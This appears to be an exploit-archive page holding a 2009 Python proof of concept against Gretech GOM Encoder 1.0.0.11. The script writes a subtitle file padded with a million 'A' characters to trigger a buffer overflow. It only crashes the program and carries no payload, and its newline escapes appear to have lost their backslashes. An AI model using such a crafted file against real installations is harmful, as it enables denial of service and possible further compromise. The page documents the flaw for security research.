[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC
# Published : 2009-03-16
# Author : Encrypt3d.M!nd
# Previous Title : WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
# Next Title : JDKChat 1.5 Remote Integer Overflow PoC
#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
# Orignal Advisory:
# http://www.securityfocus.com/bid/34120
#
chars = 'A' * 1000000
file = open ( 'devil_inside.srt', 'w' )
file.write ('1n00:00:00,001 --> 00:00:06,000n'+chars)
file.close()
# www.Syue.com [2009-03-16]